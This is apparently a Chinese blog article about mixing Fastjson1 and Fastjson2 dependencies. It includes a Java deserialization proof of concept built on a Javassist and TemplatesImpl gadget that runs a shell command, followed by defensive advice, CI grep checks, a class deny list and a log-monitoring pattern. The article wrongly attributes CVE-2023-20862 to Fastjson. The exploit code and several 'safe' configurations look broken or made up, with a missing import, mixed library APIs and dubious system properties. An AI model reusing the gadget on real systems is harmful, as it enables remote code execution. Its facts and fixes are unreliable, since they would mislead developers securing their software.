别再混着用了!Fastjson1和Fastjson2混搭依赖的隐藏风险(附2.0.26漏洞复现)
Fastjson1与Fastjson2混用引发的安全危机:从漏洞复现到依赖治理实战
在Java生态中,JSON处理库的选择往往牵一发而动全身。当老牌劲旅Fastjson1与革新者Fastjson2在同一个项目中"共处一室"时,看似简单的依赖冲突背后,实则暗藏足以摧毁系统安全的致命陷阱。最近爆出的Fastjson2≤2.0.26反序列化漏洞,正是这种混合环境下最具代表性的"沉默杀手"。
1. 危险的版本共舞:Fastjson混用现状剖析
打开任何一个中型Java项目的pom.xml文件,有很大概率会看到这样的场景:
<dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.83</version> </dependency> <dependency> <groupId>com.alibaba.fastjson2</groupId> <artifactId>fastjson2</artifactId> <version>2.0.25</version> </dependency>这种配置在开发者社区中被称为"双版本共存模式",其产生通常源于三种典型场景:
- 历史包袱:老模块使用Fastjson1的特定API,重构成本高
- 渐进升级:试图通过部分引入Fastjson2来测试性能
- 依赖传递:第三方库隐式引入了不同版本
但鲜为人知的是,这种混搭会引发三类致命问题:
| 问题类型 | Fastjson1单独使用 | Fastjson2单独使用 | 双版本共存 |
|---|---|---|---|
| 类加载冲突 | 低概率 | 低概率 | 必然发生 |
| 漏洞叠加 | 可控 | 可控 | 风险倍增 |
| 行为不一致 | 无 | 无 | 难以追踪 |
特别是在漏洞利用方面,混合环境会创造独特的攻击面。攻击者可以精心构造一个JSON payload,使其在Fastjson1中解析失败后,被Fastjson2以危险的方式处理——这种"失败渗透"策略正是CVE-2023-20862的核心攻击手法。
2. 漏洞复现:2.0.26反序列化攻击全流程
让我们通过一个可立即执行的PoC,揭示这个漏洞的完整攻击链。首先准备以下实验环境:
- JDK 8u202(注意:高版本JDK存在部分缓解机制)
- Maven项目包含以下依赖:
<dependencies> <!-- 漏洞利用必要组件 --> <dependency> <groupId>org.javassist</groupId> <artifactId>javassist</artifactId> <version>3.29.2-GA</version> </dependency> <!-- 危险组合 --> <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.83</version> </dependency> <dependency> <groupId>com.alibaba.fastjson2</groupId> <artifactId>fastjson2</artifactId> <version>2.0.26</version> </dependency> </dependencies>接着是完整的攻击代码实现:
import com.alibaba.fastjson2.JSONArray; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import javassist.*; public class ExploitGenerator { public static TemplatesImpl createTemplatesImpl() throws Exception { ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.makeClass("Exploit"); CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"); clazz.setSuperclass(superClass); // 修改此处命令可实现不同攻击效果 CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz); constructor.setBody("{ Runtime.getRuntime().exec(\"open -a Calculator\"); }"); clazz.addConstructor(constructor); byte[] bytecode = clazz.toBytecode(); TemplatesImpl templates = TemplatesImpl.class.newInstance(); // 通过反射设置必要字段 setField(templates, "_bytecodes", new byte[][]{bytecode}); setField(templates, "_name", "Pwned"); setField(templates, "_tfactory", null); return templates; } private static void setField(Object obj, String fieldName, Object value) throws Exception { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static void main(String[] args) throws Exception { JSONArray maliciousArray = new JSONArray(); maliciousArray.add(createTemplatesImpl()); // 模拟从网络接收的恶意JSON String evilJson = maliciousArray.toJSONString(); System.out.println("发送恶意JSON: " + evilJson); // 受害者解析代码 Object parsed = com.alibaba.fastjson2.JSON.parse(evilJson); System.out.println("解析结果: " + parsed); } }这个PoC揭示了漏洞触发的关键节点:
- 字节码构造阶段:使用Javassist动态生成包含恶意代码的类
- 载体包装阶段:通过TemplatesImpl承载恶意字节码
- 序列化阶段:利用JSONArray的特殊处理逻辑
- 触发阶段:Fastjson2在解析时自动触发代码执行
警告:此PoC仅用于教育目的,在实际环境中执行可能违反计算机安全法律
3. 依赖治理:从混乱到有序的实战方案
解决混用问题的核心在于建立清晰的依赖边界。以下是经过大型项目验证的迁移路线:
3.1 依赖分析阶段
使用maven-dependency-plugin生成完整的依赖树:
mvn dependency:tree -Dincludes=com.alibaba:fastjson*典型输出会显示类似这样的冲突:
[INFO] com.example:demo:jar:1.0.0 [INFO] +- com.alibaba:fastjson:jar:1.2.83:compile [INFO] +- org.thirdparty:lib-core:jar:3.2.1:compile [INFO] | \- com.alibaba.fastjson2:fastjson2:jar:2.0.25:compile3.2 迁移实施步骤
建立隔离层(关键防御措施)
public class JsonUtils { private static final boolean USE_V2 = true; public static String toJson(Object obj) { return USE_V2 ? com.alibaba.fastjson2.JSON.toJSONString(obj) : com.alibaba.fastjson.JSON.toJSONString(obj); } // 其他方法同理 }版本统一方案
对于Maven项目,在dependencyManagement中强制指定版本:
<dependencyManagement> <dependencies> <dependency> <groupId>com.alibaba.fastjson2</groupId> <artifactId>fastjson2</artifactId> <version>2.0.42</version> <!-- 安全版本 --> </dependency> </dependencies> </dependencyManagement>- 自动化检测手段
在CI/CD流水线中加入安全检查:
# 检查是否混用 if grep -q "fastjson" pom.xml && grep -q "fastjson2" pom.xml; then echo "CRITICAL: Fastjson混用检测失败" exit 1 fi # 检查是否使用漏洞版本 if grep -q "2.0.2[0-6]" pom.xml; then echo "CRITICAL: 检测到漏洞版本Fastjson2" exit 1 fi4. 深度防御:构建JSON处理的安全体系
单纯的版本升级远不能解决所有安全问题,需要建立多层防御:
输入验证层
public class SafeJsonParser { private static final Set<String> ALLOWED_CLASSES = Set.of("java.util.Map", "java.util.List"); public static Object parseSafe(String json) { ParserConfig config = new ParserConfig(); config.addDeny("com.sun."); config.addDeny("javax.management."); config.setAutoTypeSupport(false); return JSON.parse(json, config); } }运行时防护
- 启用SecurityManager
- 配置JVM参数:
-Dfastjson2.parser.safeMode=true
监控体系
# 日志监控规则示例 grep -E 'AbstractTranslet|TemplatesImpl' application.log | alert应急响应方案
当发现攻击尝试时,立即执行:
// 全局替换为Gson等替代方案 System.setProperty("fastjson.disabled", "true");在大型金融系统项目中,我们曾通过这套组合拳成功拦截了多次针对Fastjson漏洞的攻击尝试。其中一个关键发现是:攻击者通常会先发送测试payload探测版本信息,因此在WAF规则中需要特别关注类似@type等特征字段的异常出现频率。